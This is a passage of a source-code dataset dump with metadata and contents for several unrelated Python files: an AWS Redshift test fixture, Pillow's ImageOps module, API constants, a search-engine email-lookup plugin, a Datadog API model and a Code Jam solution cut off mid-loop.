Dataset schema (one row per source file):

| column | dtype | stats |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 209 |
| max_stars_repo_name | string | length 5 to 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | 1 to 10 items |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 to 209 |
| max_issues_repo_name | string | length 5 to 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | 1 to 10 items |
| max_issues_count | int64 | 1 to 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 to 209 |
| max_forks_repo_name | string | length 5 to 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | 1 to 10 items |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |
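The columns above follow the per-file layout used by Stack-style source-code datasets: file hash and size, per-repo star/issue/fork metadata, the raw `content`, and simple text statistics. A minimal sketch of consuming such rows with the Hugging Face `datasets` library; the dataset path is a placeholder, not something named in this dump:

```python
# Sketch only: "org/this-code-dataset" is a placeholder path, not taken from this document.
from datasets import load_dataset

ds = load_dataset("org/this-code-dataset", split="train", streaming=True)

for row in ds:
    # Column names follow the schema listed above.
    stars = row["max_stars_count"]          # nullable int
    if stars is not None and stars >= 100:
        source = row["content"]             # full file text
        path = row["max_stars_repo_path"]
        repo = row["max_stars_repo_name"]
        licenses = row["max_stars_repo_licenses"]
        print(repo, path, len(source), licenses)
```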
hexsha: ddd89d2c7441f04a92b4e5210d667a836ca1c871 | size: 3,253 | ext: py | lang: Python
max_stars: tests/data/aws/redshift.py @ sckevmit/cartography (fefb63b5ec97986dcc29038331d0e5b027b95d5f), licenses ["Apache-2.0"], count 2,322, events 2019-03-02T01:07:20.000Z to 2022-03-31T20:39:12.000Z
max_issues: tests/data/aws/redshift.py @ sckevmit/cartography (fefb63b5ec97986dcc29038331d0e5b027b95d5f), licenses ["Apache-2.0"], count 462, events 2019-03-07T18:38:11.000Z to 2022-03-31T14:55:20.000Z
max_forks: tests/data/aws/redshift.py @ sckevmit/cartography (fefb63b5ec97986dcc29038331d0e5b027b95d5f), licenses ["Apache-2.0"], count 246, events 2019-03-03T02:39:23.000Z to 2022-02-24T09:46:38.000Z
content:
import datetime
CLUSTERS = [{
'AllowVersionUpgrade': True,
'AutomatedSnapshotRetentionPeriod': 35,
'AvailabilityZone': 'us-east-1e',
'ClusterCreateTime': datetime.datetime(2018, 9, 12, 0, 19, 33, 652000),
'ClusterIdentifier': 'my-cluster',
'ClusterNodes': [
{
'NodeRole': 'LEADER',
'PrivateIPAddress': '10.0.34.72',
'PublicIPAddress': '1.2.3.4',
},
{
'NodeRole': 'COMPUTE-0',
'PrivateIPAddress': '10.0.45.66',
'PublicIPAddress': '2.3.4.5',
},
],
'ClusterParameterGroups': [{
'ClusterParameterStatusList': [
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'enable_user_activity_logging',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'max_cursor_result_set_size',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'query_group',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'datestyle',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'extra_float_digits',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'search_path',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'statement_timeout',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'wlm_json_configuration',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'require_ssl',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'use_fips_ssl',
},
],
'ParameterApplyStatus': 'in-sync',
'ParameterGroupName': 'my-cluster',
}],
'ClusterPublicKey': 'ssh-rsa AAAA Amazon-Redshift\n',
'ClusterRevisionNumber': '15503',
'ClusterSecurityGroups': [],
'ClusterStatus': 'available',
'ClusterSubnetGroupName': 'redshift',
'ClusterVersion': '1.0',
'DBName': 'dev',
'DeferredMaintenanceWindows': [],
'ElasticResizeNumberOfNodeOptions': '[2,3,5,6,7,8]',
'Encrypted': True,
'Endpoint': {
'Address': 'my-cluster.abc.us-east-1.redshift.amazonaws.example.com',
'Port': 5439,
},
'EnhancedVpcRouting': False,
'IamRoles': [{
'ApplyStatus': 'in-sync',
'IamRoleArn': 'arn:aws:iam::1111:role/my-redshift-iam-role',
}],
'KmsKeyId': 'arn:aws:kms:us-east-1:1111:key/GUID',
'MaintenanceTrackName': 'trailing',
'ManualSnapshotRetentionPeriod': -1,
'MasterUsername': 'masteruser',
'NodeType': 'ds2.8xlarge',
'NumberOfNodes': 2,
'PendingModifiedValues': {},
'PreferredMaintenanceWindow': 'wed:09:00-wed:09:30',
'PubliclyAccessible': False,
'Tags': [],
'VpcId': 'my_vpc',
'VpcSecurityGroups': [{
'Status': 'active',
'VpcSecurityGroupId': 'my-vpc-sg',
}],
}]
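Purely as an illustration of the fixture's shape (this loop is not part of the cartography test suite), the cluster endpoint and node addresses can be read straight out of `CLUSTERS`:

```python
# Illustration only; assumes the CLUSTERS fixture above is importable from the test data module.
for cluster in CLUSTERS:
    endpoint = cluster['Endpoint']
    print(cluster['ClusterIdentifier'], '%s:%d' % (endpoint['Address'], endpoint['Port']))
    for node in cluster['ClusterNodes']:
        print('  %s %s -> %s' % (node['NodeRole'], node['PrivateIPAddress'], node['PublicIPAddress']))
```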
avg_line_length: 31.892157 | max_line_length: 77 | alphanum_fraction: 0.51245

hexsha: 058447b68259e651fe67a60b08dd192b3f3d90e3 | size: 19,804 | ext: py | lang: Python
max_stars: virtual/lib/python3.6/site-packages/PIL/ImageOps.py @ drewheathens/The-Moringa-Tribune (98ee4d63c9df6f1f7497fc6876960a822d914500), licenses ["MIT"], count 12, events 2019-08-02T07:58:16.000Z to 2022-01-31T23:45:08.000Z
max_issues: virtual/lib/python3.6/site-packages/PIL/ImageOps.py @ drewheathens/The-Moringa-Tribune (98ee4d63c9df6f1f7497fc6876960a822d914500), licenses ["MIT"], count 23, events 2019-01-19T08:54:48.000Z to 2022-03-11T23:39:37.000Z
max_forks: virtual/lib/python3.6/site-packages/PIL/ImageOps.py @ eyern/instagram_clone (c18da15b35d28d91c3f63904af9d5da4e8e3e8ae), licenses ["MIT"], count 11, events 2019-07-31T16:23:36.000Z to 2022-01-29T08:30:07.000Z
content:
#
# The Python Imaging Library.
# $Id$
#
# standard image operations
#
# History:
# 2001-10-20 fl Created
# 2001-10-23 fl Added autocontrast operator
# 2001-12-18 fl Added Kevin's fit operator
# 2004-03-14 fl Fixed potential division by zero in equalize
# 2005-05-05 fl Fixed equalize for low number of values
#
# Copyright (c) 2001-2004 by Secret Labs AB
# Copyright (c) 2001-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isStringType
import operator
import functools
import warnings
#
# helpers
def _border(border):
if isinstance(border, tuple):
if len(border) == 2:
left, top = right, bottom = border
elif len(border) == 4:
left, top, right, bottom = border
else:
left = top = right = bottom = border
return left, top, right, bottom
def _color(color, mode):
if isStringType(color):
from . import ImageColor
color = ImageColor.getcolor(color, mode)
return color
def _lut(image, lut):
if image.mode == "P":
# FIXME: apply to lookup table, not image data
raise NotImplementedError("mode P support coming soon")
elif image.mode in ("L", "RGB"):
if image.mode == "RGB" and len(lut) == 256:
lut = lut + lut + lut
return image.point(lut)
else:
raise IOError("not supported for this image mode")
#
# actions
def autocontrast(image, cutoff=0, ignore=None):
"""
Maximize (normalize) image contrast. This function calculates a
histogram of the input image, removes **cutoff** percent of the
lightest and darkest pixels from the histogram, and remaps the image
so that the darkest pixel becomes black (0), and the lightest
becomes white (255).
:param image: The image to process.
    :param cutoff: The percent to cut off from each end of the histogram.
:param ignore: The background pixel value (use None for no background).
:return: An image.
"""
histogram = image.histogram()
lut = []
for layer in range(0, len(histogram), 256):
h = histogram[layer:layer+256]
if ignore is not None:
# get rid of outliers
try:
h[ignore] = 0
except TypeError:
# assume sequence
for ix in ignore:
h[ix] = 0
if cutoff:
# cut off pixels from both ends of the histogram
# get number of pixels
n = 0
for ix in range(256):
n = n + h[ix]
# remove cutoff% pixels from the low end
cut = n * cutoff // 100
for lo in range(256):
if cut > h[lo]:
cut = cut - h[lo]
h[lo] = 0
else:
h[lo] -= cut
cut = 0
if cut <= 0:
break
# remove cutoff% samples from the hi end
cut = n * cutoff // 100
for hi in range(255, -1, -1):
if cut > h[hi]:
cut = cut - h[hi]
h[hi] = 0
else:
h[hi] -= cut
cut = 0
if cut <= 0:
break
# find lowest/highest samples after preprocessing
for lo in range(256):
if h[lo]:
break
for hi in range(255, -1, -1):
if h[hi]:
break
if hi <= lo:
# don't bother
lut.extend(list(range(256)))
else:
scale = 255.0 / (hi - lo)
offset = -lo * scale
for ix in range(256):
ix = int(ix * scale + offset)
if ix < 0:
ix = 0
elif ix > 255:
ix = 255
lut.append(ix)
return _lut(image, lut)
def colorize(image, black, white, mid=None, blackpoint=0,
whitepoint=255, midpoint=127):
"""
Colorize grayscale image.
This function calculates a color wedge which maps all black pixels in
the source image to the first color and all white pixels to the
second color. If **mid** is specified, it uses three-color mapping.
The **black** and **white** arguments should be RGB tuples or color names;
optionally you can use three-color mapping by also specifying **mid**.
    Mapping positions can be specified for each color (e.g. **blackpoint**);
    each of these parameters is the integer input level at which the
    corresponding color is applied.
These parameters must have logical order, such that
**blackpoint** <= **midpoint** <= **whitepoint** (if **mid** is specified).
:param image: The image to colorize.
:param black: The color to use for black input pixels.
:param white: The color to use for white input pixels.
:param mid: The color to use for midtone input pixels.
:param blackpoint: an int value [0, 255] for the black mapping.
:param whitepoint: an int value [0, 255] for the white mapping.
:param midpoint: an int value [0, 255] for the midtone mapping.
:return: An image.
"""
# Initial asserts
assert image.mode == "L"
if mid is None:
assert 0 <= blackpoint <= whitepoint <= 255
else:
assert 0 <= blackpoint <= midpoint <= whitepoint <= 255
# Define colors from arguments
black = _color(black, "RGB")
white = _color(white, "RGB")
if mid is not None:
mid = _color(mid, "RGB")
# Empty lists for the mapping
red = []
green = []
blue = []
# Create the low-end values
for i in range(0, blackpoint):
red.append(black[0])
green.append(black[1])
blue.append(black[2])
# Create the mapping (2-color)
if mid is None:
range_map = range(0, whitepoint - blackpoint)
for i in range_map:
red.append(black[0] + i * (white[0] - black[0]) // len(range_map))
green.append(black[1] + i * (white[1] - black[1]) // len(range_map))
blue.append(black[2] + i * (white[2] - black[2]) // len(range_map))
# Create the mapping (3-color)
else:
range_map1 = range(0, midpoint - blackpoint)
range_map2 = range(0, whitepoint - midpoint)
for i in range_map1:
red.append(black[0] + i * (mid[0] - black[0]) // len(range_map1))
green.append(black[1] + i * (mid[1] - black[1]) // len(range_map1))
blue.append(black[2] + i * (mid[2] - black[2]) // len(range_map1))
for i in range_map2:
red.append(mid[0] + i * (white[0] - mid[0]) // len(range_map2))
green.append(mid[1] + i * (white[1] - mid[1]) // len(range_map2))
blue.append(mid[2] + i * (white[2] - mid[2]) // len(range_map2))
# Create the high-end values
for i in range(0, 256 - whitepoint):
red.append(white[0])
green.append(white[1])
blue.append(white[2])
# Return converted image
image = image.convert("RGB")
return _lut(image, red + green + blue)
def pad(image, size, method=Image.NEAREST, color=None, centering=(0.5, 0.5)):
"""
Returns a sized and padded version of the image, expanded to fill the
requested aspect ratio and size.
:param image: The image to size and crop.
:param size: The requested output size in pixels, given as a
(width, height) tuple.
:param method: What resampling method to use. Default is
:py:attr:`PIL.Image.NEAREST`.
:param color: The background color of the padded image.
:param centering: Control the position of the original image within the
padded version.
(0.5, 0.5) will keep the image centered
(0, 0) will keep the image aligned to the top left
(1, 1) will keep the image aligned to the bottom
right
:return: An image.
"""
im_ratio = image.width / image.height
dest_ratio = float(size[0]) / size[1]
if im_ratio == dest_ratio:
out = image.resize(size, resample=method)
else:
out = Image.new(image.mode, size, color)
if im_ratio > dest_ratio:
new_height = int(image.height / image.width * size[0])
if new_height != size[1]:
image = image.resize((size[0], new_height), resample=method)
y = int((size[1] - new_height) * max(0, min(centering[1], 1)))
out.paste(image, (0, y))
else:
new_width = int(image.width / image.height * size[1])
if new_width != size[0]:
image = image.resize((new_width, size[1]), resample=method)
x = int((size[0] - new_width) * max(0, min(centering[0], 1)))
out.paste(image, (x, 0))
return out
def crop(image, border=0):
"""
Remove border from image. The same amount of pixels are removed
from all four sides. This function works on all image modes.
.. seealso:: :py:meth:`~PIL.Image.Image.crop`
:param image: The image to crop.
:param border: The number of pixels to remove.
:return: An image.
"""
left, top, right, bottom = _border(border)
return image.crop(
(left, top, image.size[0]-right, image.size[1]-bottom)
)
def scale(image, factor, resample=Image.NEAREST):
"""
    Returns a rescaled image by a specific factor given as a parameter.
    A factor greater than 1 expands the image; a factor between 0 and 1
    contracts it.
:param image: The image to rescale.
:param factor: The expansion factor, as a float.
:param resample: An optional resampling filter. Same values possible as
in the PIL.Image.resize function.
:returns: An :py:class:`~PIL.Image.Image` object.
"""
if factor == 1:
return image.copy()
elif factor <= 0:
raise ValueError("the factor must be greater than 0")
else:
size = (int(round(factor * image.width)),
int(round(factor * image.height)))
return image.resize(size, resample)
def deform(image, deformer, resample=Image.BILINEAR):
"""
Deform the image.
:param image: The image to deform.
:param deformer: A deformer object. Any object that implements a
**getmesh** method can be used.
:param resample: An optional resampling filter. Same values possible as
in the PIL.Image.transform function.
:return: An image.
"""
return image.transform(
image.size, Image.MESH, deformer.getmesh(image), resample
)
def equalize(image, mask=None):
"""
Equalize the image histogram. This function applies a non-linear
mapping to the input image, in order to create a uniform
distribution of grayscale values in the output image.
:param image: The image to equalize.
:param mask: An optional mask. If given, only the pixels selected by
the mask are included in the analysis.
:return: An image.
"""
if image.mode == "P":
image = image.convert("RGB")
h = image.histogram(mask)
lut = []
for b in range(0, len(h), 256):
histo = [_f for _f in h[b:b+256] if _f]
if len(histo) <= 1:
lut.extend(list(range(256)))
else:
step = (functools.reduce(operator.add, histo) - histo[-1]) // 255
if not step:
lut.extend(list(range(256)))
else:
n = step // 2
for i in range(256):
lut.append(n // step)
n = n + h[i+b]
return _lut(image, lut)
def expand(image, border=0, fill=0):
"""
    Add a border to the image.
:param image: The image to expand.
:param border: Border width, in pixels.
:param fill: Pixel fill value (a color value). Default is 0 (black).
:return: An image.
"""
left, top, right, bottom = _border(border)
width = left + image.size[0] + right
height = top + image.size[1] + bottom
out = Image.new(image.mode, (width, height), _color(fill, image.mode))
out.paste(image, (left, top))
return out
def fit(image, size, method=Image.NEAREST, bleed=0.0, centering=(0.5, 0.5)):
"""
Returns a sized and cropped version of the image, cropped to the
requested aspect ratio and size.
This function was contributed by Kevin Cazabon.
:param image: The image to size and crop.
:param size: The requested output size in pixels, given as a
(width, height) tuple.
:param method: What resampling method to use. Default is
:py:attr:`PIL.Image.NEAREST`.
:param bleed: Remove a border around the outside of the image from all
four edges. The value is a decimal percentage (use 0.01 for
one percent). The default value is 0 (no border).
Cannot be greater than or equal to 0.5.
:param centering: Control the cropping position. Use (0.5, 0.5) for
center cropping (e.g. if cropping the width, take 50% off
of the left side, and therefore 50% off the right side).
(0.0, 0.0) will crop from the top left corner (i.e. if
cropping the width, take all of the crop off of the right
side, and if cropping the height, take all of it off the
bottom). (1.0, 0.0) will crop from the bottom left
corner, etc. (i.e. if cropping the width, take all of the
crop off the left side, and if cropping the height take
none from the top, and therefore all off the bottom).
:return: An image.
"""
# by Kevin Cazabon, Feb 17/2000
# kevin@cazabon.com
# http://www.cazabon.com
# ensure centering is mutable
centering = list(centering)
if not 0.0 <= centering[0] <= 1.0:
centering[0] = 0.5
if not 0.0 <= centering[1] <= 1.0:
centering[1] = 0.5
if not 0.0 <= bleed < 0.5:
bleed = 0.0
# calculate the area to use for resizing and cropping, subtracting
# the 'bleed' around the edges
# number of pixels to trim off on Top and Bottom, Left and Right
bleed_pixels = (bleed * image.size[0], bleed * image.size[1])
live_size = (image.size[0] - bleed_pixels[0] * 2,
image.size[1] - bleed_pixels[1] * 2)
# calculate the aspect ratio of the live_size
live_size_ratio = float(live_size[0]) / live_size[1]
# calculate the aspect ratio of the output image
output_ratio = float(size[0]) / size[1]
# figure out if the sides or top/bottom will be cropped off
if live_size_ratio >= output_ratio:
# live_size is wider than what's needed, crop the sides
crop_width = output_ratio * live_size[1]
crop_height = live_size[1]
else:
# live_size is taller than what's needed, crop the top and bottom
crop_width = live_size[0]
crop_height = live_size[0] / output_ratio
# make the crop
crop_left = bleed_pixels[0] + (live_size[0]-crop_width) * centering[0]
crop_top = bleed_pixels[1] + (live_size[1]-crop_height) * centering[1]
crop = (
crop_left, crop_top,
crop_left + crop_width, crop_top + crop_height
)
# resize the image and return it
return image.resize(size, method, box=crop)
def flip(image):
"""
Flip the image vertically (top to bottom).
:param image: The image to flip.
:return: An image.
"""
return image.transpose(Image.FLIP_TOP_BOTTOM)
def grayscale(image):
"""
Convert the image to grayscale.
:param image: The image to convert.
:return: An image.
"""
return image.convert("L")
def invert(image):
"""
Invert (negate) the image.
:param image: The image to invert.
:return: An image.
"""
lut = []
for i in range(256):
lut.append(255-i)
return _lut(image, lut)
def mirror(image):
"""
Flip image horizontally (left to right).
:param image: The image to mirror.
:return: An image.
"""
return image.transpose(Image.FLIP_LEFT_RIGHT)
def posterize(image, bits):
"""
Reduce the number of bits for each color channel.
:param image: The image to posterize.
:param bits: The number of bits to keep for each channel (1-8).
:return: An image.
"""
lut = []
mask = ~(2**(8-bits)-1)
for i in range(256):
lut.append(i & mask)
return _lut(image, lut)
def solarize(image, threshold=128):
"""
Invert all pixel values above a threshold.
:param image: The image to solarize.
:param threshold: All pixels above this greyscale level are inverted.
:return: An image.
"""
lut = []
for i in range(256):
if i < threshold:
lut.append(i)
else:
lut.append(255-i)
return _lut(image, lut)
# --------------------------------------------------------------------
# PIL USM components, from Kevin Cazabon.
def gaussian_blur(im, radius=None):
""" PIL_usm.gblur(im, [radius])"""
warnings.warn(
'PIL.ImageOps.gaussian_blur is deprecated. '
'Use PIL.ImageFilter.GaussianBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
if radius is None:
radius = 5.0
im.load()
return im.im.gaussian_blur(radius)
def gblur(im, radius=None):
""" PIL_usm.gblur(im, [radius])"""
warnings.warn(
'PIL.ImageOps.gblur is deprecated. '
'Use PIL.ImageFilter.GaussianBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
return gaussian_blur(im, radius)
def unsharp_mask(im, radius=None, percent=None, threshold=None):
""" PIL_usm.usm(im, [radius, percent, threshold])"""
warnings.warn(
'PIL.ImageOps.unsharp_mask is deprecated. '
'Use PIL.ImageFilter.UnsharpMask instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
if radius is None:
radius = 5.0
if percent is None:
percent = 150
if threshold is None:
threshold = 3
im.load()
return im.im.unsharp_mask(radius, percent, threshold)
def usm(im, radius=None, percent=None, threshold=None):
""" PIL_usm.usm(im, [radius, percent, threshold])"""
warnings.warn(
'PIL.ImageOps.usm is deprecated. '
'Use PIL.ImageFilter.UnsharpMask instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
return unsharp_mask(im, radius, percent, threshold)
def box_blur(image, radius):
"""
Blur the image by setting each pixel to the average value of the pixels
in a square box extending radius pixels in each direction.
Supports float radius of arbitrary size. Uses an optimized implementation
which runs in linear time relative to the size of the image
for any radius value.
:param image: The image to blur.
:param radius: Size of the box in one direction. Radius 0 does not blur,
returns an identical image. Radius 1 takes 1 pixel
in each direction, i.e. 9 pixels in total.
:return: An image.
"""
warnings.warn(
'PIL.ImageOps.box_blur is deprecated. '
'Use PIL.ImageFilter.BoxBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
image.load()
return image._new(image.im.box_blur(radius))
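A short usage sketch for the operators defined above; the filename is a placeholder, and the calls are the module's own public functions:

```python
# "example.jpg" is a placeholder path; any "L" or "RGB" image works with these calls.
from PIL import Image, ImageOps

im = Image.open("example.jpg").convert("RGB")

stretched = ImageOps.autocontrast(im, cutoff=2)                  # clip 2% from each end of the histogram
thumb = ImageOps.fit(im, (256, 256), centering=(0.5, 0.5))       # crop-and-resize to a square
framed = ImageOps.expand(thumb, border=8, fill="white")          # add an 8-pixel border
negative = ImageOps.invert(ImageOps.grayscale(im))               # convert to "L", then negate
```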
avg_line_length: 31.890499 | max_line_length: 80 | alphanum_fraction: 0.587508

hexsha: 8967d95870f1150eb75e931f94e07ff299bc2e0b | size: 1,297 | ext: py | lang: Python
max_stars: api/constants.py @ Ju99ernaut/blocomposer-templates-public (74867218c42f72642ddb0a7a3e389116f4a85d3d), licenses ["MIT"], count null, events null
max_issues: api/constants.py @ Ju99ernaut/blocomposer-templates-public (74867218c42f72642ddb0a7a3e389116f4a85d3d), licenses ["MIT"], count null, events null
max_forks: api/constants.py @ Ju99ernaut/blocomposer-templates-public (74867218c42f72642ddb0a7a3e389116f4a85d3d), licenses ["MIT"], count null, events null
content:
"""
Constants useful for the data module
"""
TEMPLATES_TABLE = "templates"
ASSETS_TABLE = "assets"
BLOCKS_TABLE = "blocks"
BOOKMARKS_TABLE = "bookmarks"
COMMENTS_TABLE = "comments"
USERS_TABLE = "users"
USERS_TOKENS_TABLE = "users_tokens"
AUTHORS_TABLE = "authors"
EMAILS_TABLE = "emails"
ASSETS_KEY = "assets"
ID_KEY = "id"
UID_KEY = "uid"
UUID_KEY = "uuid"
NAME_KEY = "name"
DESCRIPTION_KEY = "description"
TEMPLATE_KEY = "template"
THUMBNAIL_KEY = "thumbnail"
PAGES_KEY = "pages"
STYLES_KEY = "styles"
URL_KEY = "url"
UPDATED_KEY = "updated_at"
USER_KEY = "user"
AUTHOR_KEY = "author"
SIZE_KEY = "size"
PUBLIC_KEY = "public"
BOOKMARKS_KEY = "bookmarks"
COMMENT_KEY = "comment"
TOKEN_KEY = "token"
FULL_NAME_KEY = "full_name"
AVATAR_URL_KEY = "avatar_url"
EMAIL_KEY = "email"
API_TAGS_METADATA = [
{"name": "user", "description": "User profile"},
{"name": "templates", "description": "Blocomposer user templates"},
{"name": "assets", "description": "Blocomposer user assets"},
{"name": "blocks", "description": "Blocomposer user blocks"},
{"name": "bookmarks", "description": "Blocomposer user bookmarks"},
{"name": "comments", "description": "Blocomposer user comments"},
{"name": "newsletter", "description": "Register/Unregister newsletter"},
]
GJS_PREFIX = "gjs-"
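The tag dictionaries in `API_TAGS_METADATA` have the shape accepted by FastAPI's `openapi_tags` parameter; whether this project actually wires them into FastAPI is an assumption, so the sketch below is illustrative only:

```python
# Assumption: the constants module feeds a FastAPI app; the route below is invented for illustration.
from fastapi import FastAPI

from api.constants import API_TAGS_METADATA, TEMPLATES_TABLE

app = FastAPI(openapi_tags=API_TAGS_METADATA)

@app.get(f"/{TEMPLATES_TABLE}", tags=["templates"])
def list_templates():
    return []
```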
avg_line_length: 27.595745 | max_line_length: 76 | alphanum_fraction: 0.704703

hexsha: ea97f10d61aea3ca7bf3467565c82d742d9b20b6 | size: 484 | ext: py | lang: Python
max_stars: plugins/exalead.py @ mirai101/Cinon (75173b2f61cbb4bb5a3a127f0e331ef1fa203e06), licenses ["Apache-2.0"], count 1, events 2020-12-26T23:30:50.000Z to 2020-12-26T23:30:50.000Z
max_issues: plugins/exalead.py @ mirai101/Cinon (75173b2f61cbb4bb5a3a127f0e331ef1fa203e06), licenses ["Apache-2.0"], count null, events null
max_forks: plugins/exalead.py @ mirai101/Cinon (75173b2f61cbb4bb5a3a127f0e331ef1fa203e06), licenses ["Apache-2.0"], count null, events null
content:
#config = None
app_cinon = None
def search(domain, limit):
url = "http://www.exalead.com/search/web/results/?q=%40{word}&elements_per_page=10&start_index={counter}"
app_cinon.init_search(url, domain, limit, 0, 50, 'Exalead')
app_cinon.process()
return app_cinon.get_emails()
class Plugin:
def __init__(self, app, conf):#
global app_cinon, config
#config = conf
app.register_plugin('exalead', {'search': search})
app_cinon = app
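The plugin only touches four methods on the host application object. A minimal, hypothetical host is enough to exercise it; only the method names `register_plugin`, `init_search`, `process`, and `get_emails` come from the code above, everything else is invented:

```python
# Hypothetical host object; the real Cinon application is not shown in this file.
class FakeApp:
    def __init__(self):
        self.plugins = {}
        self._emails = []

    def register_plugin(self, name, hooks):
        self.plugins[name] = hooks

    def init_search(self, url, domain, limit, start, step, engine_name):
        # A real host would build the paginated search requests here.
        self._query = (url, domain, limit, start, step, engine_name)

    def process(self):
        # A real host would fetch result pages and scrape addresses here.
        pass

    def get_emails(self):
        return self._emails

app = FakeApp()
Plugin(app, conf=None)                                   # registers the 'exalead' search hook
emails = app.plugins['exalead']['search']('example.com', 50)
```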
avg_line_length: 26.888889 | max_line_length: 109 | alphanum_fraction: 0.663223

hexsha: e25c9cfcad0a2266646eafd926b5b01006526627 | size: 1,892 | ext: py | lang: Python
max_stars: code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py @ Valisback/hiring-engineers (7196915dd5a429ae27c21fa43d527f0332e662ed), licenses ["Apache-2.0"], count null, events null
max_issues: code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py @ Valisback/hiring-engineers (7196915dd5a429ae27c21fa43d527f0332e662ed), licenses ["Apache-2.0"], count null, events null
max_forks: code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py @ Valisback/hiring-engineers (7196915dd5a429ae27c21fa43d527f0332e662ed), licenses ["Apache-2.0"], count null, events null
content:
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from datadog_api_client.v1.model_utils import (
ModelNormal,
cached_property,
)
class UsageAttributionPagination(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
validations = {}
@cached_property
def openapi_types():
return {
"limit": (int,),
"offset": (int,),
"sort_direction": (str,),
"sort_name": (str,),
"total_number_of_records": (int,),
}
attribute_map = {
"limit": "limit",
"offset": "offset",
"sort_direction": "sort_direction",
"sort_name": "sort_name",
"total_number_of_records": "total_number_of_records",
}
read_only_vars = {}
def __init__(self, *args, **kwargs):
"""UsageAttributionPagination - a model defined in OpenAPI
Keyword Args:
limit (int): [optional] Maximum amount of records to be returned.
offset (int): [optional] Records to be skipped before beginning to return.
sort_direction (str): [optional] Direction to sort by.
sort_name (str): [optional] Field to sort by.
total_number_of_records (int): [optional] Total number of records.
"""
super().__init__(kwargs)
self._check_pos_args(args)
@classmethod
def _from_openapi_data(cls, *args, **kwargs):
"""Helper creating a new instance from a response."""
self = super(UsageAttributionPagination, cls)._from_openapi_data(kwargs)
self._check_pos_args(args)
return self
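The model is constructed from keyword arguments matching `openapi_types`; a small sketch with made-up values (the import path mirrors the file location shown above):

```python
# Example values are arbitrary; only the keyword names come from openapi_types above.
from datadog_api_client.v1.model.usage_attribution_pagination import UsageAttributionPagination

pagination = UsageAttributionPagination(
    limit=100,
    offset=0,
    sort_direction="desc",
    sort_name="custom_timeseries_usage",
    total_number_of_records=2500,
)
print(pagination.limit, pagination.total_number_of_records)
```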
avg_line_length: 29.5625 | max_line_length: 108 | alphanum_fraction: 0.631607

hexsha: 1f66691e0404727c023074c3534a6764688e82fb | size: 3,382 | ext: py | lang: Python
max_stars: test/tests/gcj_2014_1c_b.py @ kevinxucs/pyston (bdb87c1706ac74a0d15d9bc2bae53798678a5f14), licenses ["Apache-2.0"], count 1, events 2015-11-06T03:39:51.000Z to 2015-11-06T03:39:51.000Z
max_issues: test/tests/gcj_2014_1c_b.py @ kevinxucs/pyston (bdb87c1706ac74a0d15d9bc2bae53798678a5f14), licenses ["Apache-2.0"], count null, events null
max_forks: test/tests/gcj_2014_1c_b.py @ kevinxucs/pyston (bdb87c1706ac74a0d15d9bc2bae53798678a5f14), licenses ["Apache-2.0"], count null, events null
content:
# expected: fail
# - working on it
import sys
def compact(s):
i = 0
while i < len(s) - 1:
if s[i] == s[i+1]:
s = s[:i] + s[i+1:]
else:
i += 1
return s
# TODO This should be a subclass of Exception not object:
class NotPossible(object):
pass
P = 1000000007
def fact(n):
t = 1
for i in xrange(1, n+1):
t = (t * i) % P
return t
if __name__ == "__main__":
# test data is from the Google CodeJam site:
s = """
3
3
ab bbbc cd
4
aa aa bc c
2
abc bcd
""".strip()
l = s.split('\n')
T = int(l.pop(0))
for _T in xrange(T):
N = int(l.pop(0))
trains = l.pop(0).split()
trains = map(compact, trains)
try:
for s in trains:
if s[0] in s[1:]:
raise NotPossible
if s[-1] in s[:-1]:
raise NotPossible
for c in s[1:-1]:
cnt = sum([s2.count(c) for s2 in trains])
assert cnt >= 1
if cnt != 1:
raise NotPossible()
# print trains
singles = {}
chunks = []
for i in xrange(N):
if len(trains[i]) == 1:
singles[trains[i]] = singles.get(trains[i], 0) + 1
else:
chunks.append(trains[i][0] + trains[i][-1])
# print singles, chunks
mult = 1
left = 0
while chunks:
# print mult, left, singles, chunks
first = chunks.pop()
assert len(set(first)) == len(first)
mult = (mult * fact(singles.pop(first[0], 0))) % P
